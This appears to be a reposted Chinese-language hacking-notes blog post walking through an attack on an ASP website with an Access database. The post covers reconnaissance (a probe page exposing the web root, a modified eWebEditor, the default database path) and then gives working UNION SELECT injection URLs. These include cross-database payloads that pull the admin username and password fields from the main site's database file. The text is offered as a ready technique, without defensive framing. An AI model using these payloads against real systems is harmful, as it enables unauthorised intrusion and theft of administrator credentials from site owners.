剑走偏峰之Access注入跨库查询_奈斯资源网

黑客笔记

剑走偏峰之Access注入跨库查询

时间:2018/7/16 10:28:29 作者:安琪 来自:www.nicezy.com 浏览:114 评论:0
内容摘要:对目标进行踩点如下:http://www.abc.com/news/type.asp?typeid=4UNION字段数为6,前台显示字段为3http://www.abc.com/news/type.asp?typeid=4unionselect1,2,admin,4,5,6fromadmin注入点:只能得到一个字段ad...
对目标进行踩点如下:
http://www.abc.com/news/type.asp?typeid=4
UNION字段数为6,前台显示字段为3

http://www.abc.com/news/type.asp?typeid=4 union select 1,2,admin,4,5,6 from admin
注入点: 只能得到一个字段admin, 无多大用处

此注入点与主站无关,不共用一个数据库

http://www.abc.com/aspcheck.asp
发现探针,显示WEB根目录为c:\root

发现 http://www.abc.com/ 的主站程序为网上公开的某整站管理系统

发现修改过的eWebEditor,路径为 edit/eWebEditor.asp
发现cookie欺骗漏洞, 本机测试通过,对主机欺骗不成功,原因不明,放弃此步骤
网站数据库采用默认的data/#db1.asp
数据库做了防下载处理,管理员表为admin,字段分别为user,pass

总结以上信息,得出结论如下:

主站数据库绝对路径为C:\root\data\#db1.asp
news文件夹下程序与主站程序无关

第二方案:

Access跨库注入
http://www.abc.com/news/type.asp?typeid=4 union select 1,2,user,4,5,6 from [C:\root\data\%23db1.asp].admin

http://www.abc.com/news/type.asp?typeid=4 union select 1,2,pass,4,5,6 from [C:\root\data\%23db1.asp].admin

标签:黑客技术 渗透笔记 


此资源由奈斯资源网www.nicezy.com 收集整理发布,如有问题请联系管理员说明

本站资源仅供学习参考,所有资源均来源于网络搜索及网友提供,所有言论并不代表本站立场

投诉与建议 文章投稿 E-mail:1437232096@qq.com

相关评论
加载中